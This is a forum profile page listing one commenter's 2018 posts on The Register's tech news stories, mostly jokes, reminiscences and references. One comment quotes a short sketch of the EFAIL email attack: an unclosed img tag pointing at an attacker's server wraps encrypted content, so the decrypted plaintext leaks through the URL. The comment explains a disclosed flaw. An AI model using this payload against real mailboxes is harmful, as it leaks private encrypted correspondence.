* Posts by Alan J. Wylie

428 posts • joined 12 Jul 2008

Page:

Sysadmin misses out on paycheck after student test runs amok

Alan J. Wylie
Silver badge

Ada?

Surely the payroll program was't written in a strongly typed, object oriented language commissioned by the military?

15
0

You'll never guess what you can do once you steal a laptop, reflash the BIOS, and reboot it

Alan J. Wylie
Silver badge

smacking the laptop owner with a two-by-four?

Surely a $5 wrench?

12
0

US govt concedes that you can indeed f**k Nazis online: Domain-name swear ban lifted

Alan J. Wylie
Silver badge

RevK's P.P.S on his use of a fuck.me.uk domain.

3
1

The Reg takes the US government's insider threat training course

Alan J. Wylie
Silver badge

and 94 per cent went to prison

What's the opposite of survivorship bias?

9
0

Solid password practice on Capital One's site? Don't bank on it

Alan J. Wylie
Silver badge

Nvidia promises to shift graphics grunt work to the cloud, for a price

Alan J. Wylie
Silver badge

Re: latency down to a blazing 3ms

3ms round trip doesn't get you very far.

$ units -1 "3ms c" "km"

* 899.37737

2
2

Sextortion scum armed with leaked credentials are persistent pests

Alan J. Wylie
Silver badge

US watchdog OKs robo-doc AI that spies eye disease all on its own

Alan J. Wylie
Silver badge

Re: What about all the other diseases?

That makes as much sense as complaining that a blood test for ebola can't detect a sprained ankle.

I was referring only to diseases diagnosed by inspecting the retina. What's the point of an automated system when a specialist has to look at it anyway to diagnose other diseases?

As for the prosecution, sorry - I missed a sarcasm tag. As with the case of Dr Hadiza Bawa-Garba, the case should never have been brought in the first place.

1
2
Alan J. Wylie
Silver badge

What about all the other diseases?

Macular degeneration, for one. And what happens if someone dies because of a missed diagnosis. Who do you prosecute then?

0
2

Don't let Google dox me on Lumen Database, nameless man begs

Alan J. Wylie
Silver badge

BBC Technology + Creativity Blog

The BBC's Technology + Creativity Blog posts a list of BBC pages that have been removed from Google's search results, here's the lastest post. It can be a most interesting read.

30
0

Tax the tech giants and ISPs until the bits squeak – Corbyn

Alan J. Wylie
Silver badge

ISPA's comments

https://www.ispa.org.uk/ispa-comments-on-a-levy-to-fund-a-digital-licence-fee/

increased prices ... divert resources ... slow down broadband rollout

4
1

Use Debian? Want Intel's latest CPU patch? Small print sparks big problem

Alan J. Wylie
Silver badge

Section 3

You will not, and will not allow any third party to ... (v) publish or provide any Software benchmark or comparison test results.

I can see why Debian aren't happy, seeing as without new instructions made available by microcode updates, some of the mitigations incur a significant performance hit.

67
2

Self-driving cars will be safe, we're testing them in a massive AI Sim

Alan J. Wylie
Silver badge

and crucially, road intersections

Who would have thought, 35 years ago, that all the work that a Ph.D. student from Oxford, my colleagues and I were doing programming a Laser-Scan Fastrak in Fortran on a VAX 11/780 to recognize the junctions on Ordnance Survey 1:1250 maps would lead to this?

6
0

Bank on it: It's either legal to port-scan someone without consent or it's not, fumes researcher

Alan J. Wylie
Silver badge

One law for them, another for us

Do not forget the case of poor Daniel James Cuthbert, found guilty of an offence under the Computer Misuse Act back in 2005 for adding ../.. to the URL of a charity's web site.

El Reg article

There is a very thin line between "intending to secure access" and checking to see if insecurities may be present.

20
0

Top tip? Sprinkle bugs into your code to throw off robo-vuln scanners

Alan J. Wylie
Silver badge

Chaff?

The original name for chaff was "window". A fitting name for software with a generous sprinkling of bugs.

30
2

Oi, clickbait cop bot, jam this in your neural net: Hot new AI threatens to DESTROY web journos

Alan J. Wylie
Silver badge

Re: Easy source.

Just do a search for "and you wont believe"

Also, "This one (weird|simple) trick".

BTW, does an extended regex count as AI?

11
0

ZX Spectrum reboot latest: Some Vega+s arrive, Sky pulls plug, Clive drops ball

Alan J. Wylie
Silver badge

Re: What we need

Interested in your thoughts regarding Betamax v VHS

Video 2000

I contracted for a while at Pye TVT in Cambridge (working on a TV video effects console for the 1986 World Cup). Pye was a subsidiary of Philips, and there was a factory shop. Lots of employees, contractors and their friends and families ended up with Video 2000 recorders. Rumour had it that e.g. Dixons allocated the cassettes equally to all shops, and the manager of the Cambridge branch spent a lot of time on the phone talking to other branches to get their spare stock sent to him.

Getting back on topic, I also worked on the Acorn Archimedes and the Sinclair QL.

27
0

Uptight robots that suddenly beg to stay alive are less likely to be switched off by humans

Alan J. Wylie
Silver badge

Re: Dave

Daisy, Daisy, ...

7
0

Microsoft devises new way of making you feel old: Windows NT is 25

Alan J. Wylie
Silver badge

DEC's Dave Cutler worked on VMS. Is it just co-incidence that WNT is to VMS as HAL is to IBM?

33
2

Engineers, coders – it's down to you to prevent AI being weaponised

Alan J. Wylie
Silver badge

Re: Dual use is hard.

better engineering meant better guns

Sir Joseph Whitworth's rifle

1
0
Alan J. Wylie
Silver badge

Dual use is hard.

Many years ago, I worked on computer aided mapping: semi-automated line following. Measuring the boundaries of all the woodland in the UK to calculate the total area, better 1:1250 maps with accurate buried utilities to stopping backhoes cutting fibre optic cables, what could possibly be wrong with that? Then came the Falklands war. Digitise the contours and produce a wire-frame perspective of Mount Tumbledown as viewed from Port Stanley, please.

A few years later, I worked on CNC blade tip grinders to make jet engines more fuel efficient. Making 747s greener is great. But what if the US Navy want some for their fighters? Or the Army for an AGT1500 turbine in an M1 Abrams tank?

25
0

♫ The Core i9 clock cycles go up. Who cares where they come down?

Alan J. Wylie
Silver badge

The song the headline referers to.

Tom Lehrer - Wernher von Braun

25
0

Ah, British summer. The sun is shining, the birds are singing, the internet is on the fritz

Alan J. Wylie
Silver badge

Fibre break(s) near Manchester, too

Zen: Fibre Cable break impacting Bury Exchange

Exa: At approximately 10:22am one of our core fibre links from London Telehouse to Manchester experienced total failure.

Bury is north of central Manchester, so these may be separate incidents.

2
0

Tech support chap given no training or briefing before jobs, which is why he was arrested

Alan J. Wylie
Silver badge

My similar experience with core store in a defence establishment. At least I didn't get arrested!

3
0

Another data-leaking Spectre CPU flaw among Intel's dirty dozen of security bug alerts today

Alan J. Wylie
Silver badge

Re: CVE-2018-3693 "BCBS" Bounds Check Bypass Store"

Yes - the ARM one is the same as the Intel one.

Intel Open Source Security Incident Response Team: Speculative Execution Branch Prediction Side Channel and Branch Prediction Analysis Method

CVE: CVE-2017-5753, CVE-2018-3693

https://nvd.nist.gov/vuln/detail/CVE-2018-3693

1
0
Alan J. Wylie
Silver badge

CVE-2018-3693 "BCBS" Bounds Check Bypass Store"

Note that -3639 is a very similar "speculative store bypass" from May: don't get confused as I did for a short time. Could -3693 be the same as the Intel one?

Mark Rutland of ARM on the Linux Kernel Mailing List

arm64: spectre-v1 write fixes (CVE-2018-3693)

These patches inhibit spectre-v1-write gadgets found in arch/arm64, using the same mitigation applied to existing spectre-v1-read gadgets.

This issue is also known as CVE-2018-3693, or "bounds check bypass store". More details can be found in the Arm Cache Speculation Side-channels whitepaper, available from the Arm security updates site [1].

[1]

6
0

Leatherbound analogue password manager: For the hipster who doesn't mind losing everything

Alan J. Wylie
Silver badge

As recommended by Bruce Schneier

Write Down Your Password

Well - it was a long time ago.

3
0

And in current affairs: Rogue raccoon blacks out city power grid after shocking misstep

Alan J. Wylie
Silver badge

The other Large Hadron Collider incident

Large Hadron Collider scuttled by birdy baguette-bomber

2
0

Things that make you go hmmm: Do crypto key servers violate GDPR?

Alan J. Wylie
Silver badge

Almost 20 years of employment history.

A quick search on a keyserver for my name shows many of the companies I have worked for over the last 20 years.

9
0
Alan J. Wylie
Silver badge

Firstly PGP public keys are on the server and placed there by the key owners.

They can be uploaded by anyone who possesses them. Co-workers, anyone with whom you have shared the public key.

10
0

Git365. Git for Teams. Quatermass and the Git Pit. GitHub simply won't do now Microsoft has it

Alan J. Wylie
Silver badge

Happy birthday, you lumbering MS-DOS-based mess: Windows 98 turns 20 today

Alan J. Wylie
Silver badge

Active Desktop, which allowed HTML content (such as news headlines) to be shown on the user's desktop at the cost of prodigious amounts of CPU and RAM.

And bandwidth. I can remember one cow-orker enabling it, which rapidly became apparent when we looked at the ISDN logs and discovered that his desktop, left on overnight, had been connecting every few minutes, bringing the line up over and over again, incurring a call charge every time.

14
0

UK footie fans furious as Sky Broadband goes TITSUP: Total inability to stream unfair penalties

Alan J. Wylie
Silver badge

Seems to have affected Zen Internet too

Routing & Core Network Loss of Resilience

They seem to have had redundancy and no outage.

One update of interest:

Engineers are continuing to work on the fibre break.

The work is currently being delayed by numerous road works.

11
0

It's time for TLS 1.0 and 1.1 to die (die, die)

Alan J. Wylie
Silver badge

Not only do they only support TLS1.0, but including RC4-SHA in their cipher list? Really?

Supported Server Cipher(s):

Preferred TLSv1.0 128 bits AES128-SHA

Accepted TLSv1.0 256 bits AES256-SHA

Accepted TLSv1.0 128 bits RC4-SHA

Accepted TLSv1.0 112 bits DES-CBC3-SHA

Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256

Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256

Accepted TLSv1.0 128 bits RC4-MD5

1
0

User spent 20 minutes trying to move mouse cursor, without success

Alan J. Wylie
Silver badge

Sun optical mice, circa 1985

How many here remember the optical mice on early '80s Sun worksations?

Mouse Systems

There was a special mouse pad with horizontal and vertical lines on it.

26
0

New York State is trying to ban 'deepfakes' and Hollywood isn't happy

Alan J. Wylie
Silver badge

Re: Bullshit

So crafting a “digital replica” for films, adverts, musicals, for commercial purposes or without explicit written consent is violation of an individual’s rights."

And what about Woody Alllen's Zelig and Dead Men Don't Wear Plaid?

4
4

Void Linux gave itself to the void, Korora needs a long siesta – life is hard for small distros

Alan J. Wylie
Silver badge

Missing lead developers

The main developer of Void Linux has apparently disappeared.

That reminds me of the problem Centos had quite a few years ago:

CentOS back from brink of death, Disappearing admin reappears

4
0

PGP and S/MIME decryptors can leak plaintext from emails, says infosec professor

Alan J. Wylie
Silver badge
Alan J. Wylie
Silver badge

Re: It seems it's a vul'n in HTML parsing in some clients

Martijn Grooten on twitter

The first of two (!) attacks does seem rather simple. Send email with three MIME parts: 1. <img src="http://yourserver.com/ " 2. [PGP encrypted content] 3. "> Mail client decrypts 2, concatenates three parts and does lookup on the URL which you control.

7
0
Alan J. Wylie
Silver badge

T-Mobile owner sends in legal heavies to lean on small Brit biz over use of 'trademarked' magenta

Alan J. Wylie
Silver badge

We need a crowd-sourced distributed binary (hexagonal?) chop on the RGB triplets to find out exactly where the lawyers stop alleging that a particular shade infringes. We can then mock them mercilessly for claiming that one shade of magenta is OK and an indistinguishable one a fraction away in colour space doesn't.

5
0

UK age-checking smut overlord won't be able to handle the pressure – critics

Alan J. Wylie
Silver badge

Re: Lesbian Spank Inferno

$ whois LesbianSpankInferno.co.uk | grep "Registered on:"

Registered on: 23-Apr-2018

6
0

US military base stores pull Huawei, ZTE kit off the shelves

Alan J. Wylie
Silver badge

Today's NCSC advice

ZTE: NCSC advice to select telecommunications operators with national security concerns

The NCSC has issued advice to a limited number of UK telecommunications operators regarding the potential use of ZTE equipment and services. ... NCSC assess that the national security risks arising from the use of ZTE equipment or services within the context of the existing UK telecommunications infrastructure cannot be mitigated

0
2

GitLab crawling back online after breaking its brain in two

Alan J. Wylie
Silver badge

gitlab vulnerabilities disclosed

I wonder whether the problem was as a result of these vulnerabilities being patched:

https://twitter.com/jobertabma/status/989708798515265539

Jobert Abma, 4:32 am - 27 Apr 2018

In December I found a number bugs in @gitlab, all of which were disclosed today. The team responded swiftly and professionally and is a pleasure to work with. I'll describe each vulnerability in a separate tweet in this thread. Enjoy them and happy hacking!

0
0

ISO blocks NSA's latest IoT encryption systems amid murky tales of backdoors and bullying

Alan J. Wylie
Silver badge

The ciphers look as if they will remain in the Linux kernel

http://lists.infradead.org/pipermail/linux-arm-kernel/2018-April/573548.html

Eric Biggers points out that there is no alternative block cipher suitable for low power processors to support dm-crypt or fscrypt filesystem encryption, and the alternative is no encryption at all.

Bruce Schneier's opinion is Personally, I doubt that they're backdoored

15
4

TSB outage, day 5: What do you mean you can't log in? Our systems are up and running. Up and running, we say!

Alan J. Wylie
Silver badge

loading failed for script

https://pbs.twimg.com/media/DbiPvH7WsAAj3Iu.jpg

"Loading failed for the <script> with the source "https://dpm.demdex.net/"...

"Loading failed for the <script> with the source "https://visitor-service.tealiumiq.com/"...

What on earth are these doing on a supposedly secure page?

21
0

The tech you're reading these words on – you have two Dundee uni boffins to thank for that

Alan J. Wylie
Silver badge

Re: Spear

Otto Frisch too, who founded Laser-Scan, which worked with RSRE on liquid crystal displays (see my earlier post).

5
0
Alan J. Wylie
Silver badge

RSRE and Laser-Scan

RSRE (as it had become by the early 80's) and Laser-Scan in Cambridge worked on an alternative to individually driven LCD pixels, by drawing vector graphics using an infra-red laser to switch the phase of the LCD.

Reference to 1984 paper: Laser-Addressed Liquid Crystal Displays

I can still remember the goggles, locked doors and notice: "Do not stare into laser beam with remaining eye".

18
0

Page:

Forums

Biting the hand that feeds IT © 1998–2018